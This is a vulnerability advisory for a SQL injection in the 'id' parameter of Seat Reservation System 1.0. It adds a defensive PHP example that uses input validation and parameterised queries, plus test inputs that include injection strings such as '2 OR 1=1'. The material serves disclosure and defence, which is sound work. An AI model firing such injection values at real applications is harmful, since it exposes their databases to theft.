Vendor: Seat Reservation System
By: Augkim
CVSS: 8.8 (HIGH)
SQL Injection
CWE: 89
Product Name: Seat Reservation System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:seat_reservation_system_using_php:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Apache2
2020
Seat Reservation System 1.0 – ‘id’ SQL Injection
A SQL injection vulnerability exists in the Seat Reservation System 1.0 web application. An attacker can send a specially crafted HTTP POST request to the vulnerable application and have attacker-controlled SQL executed as part of the application's queries. This can be exploited to gain access to sensitive information from the database.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
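An added illustration of the mitigation (not code from the application or from this advisory): the `id` value is validated as a positive integer and then bound as a typed parameter, which goes one step beyond validation alone. The `reservations` table, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for the application's database (constructed sample data).
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE reservations (id INTEGER PRIMARY KEY, customer TEXT)');
    $pdo->exec("INSERT INTO reservations (id, customer) VALUES (1, 'Alice'), (2, 'Bob')");
    return $pdo;
}

// Validation: accept only a positive decimal integer; anything else is rejected.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing field, or an array submitted as id[]=...
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Query: the id is bound as a typed parameter, never concatenated into the SQL text.
// In a request handler, $rawId would be $_POST['id'] ?? null.
function find_reservation(PDO $pdo, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null; // caller should answer with HTTP 400
    }
    $stmt = $pdo->prepare('SELECT id, customer FROM reservations WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demo_db();
// Constructed inputs: one well-formed id followed by malformed values.
foreach (['2', '2 OR 1=1', "1'", '', ['1']] as $input) {
    $row = find_reservation($pdo, $input);
    echo json_encode($input), ' => ', $row ? json_encode($row) : 'rejected / not found', PHP_EOL;
}
```

Only the first input returns a row; every malformed value is rejected before a query is prepared.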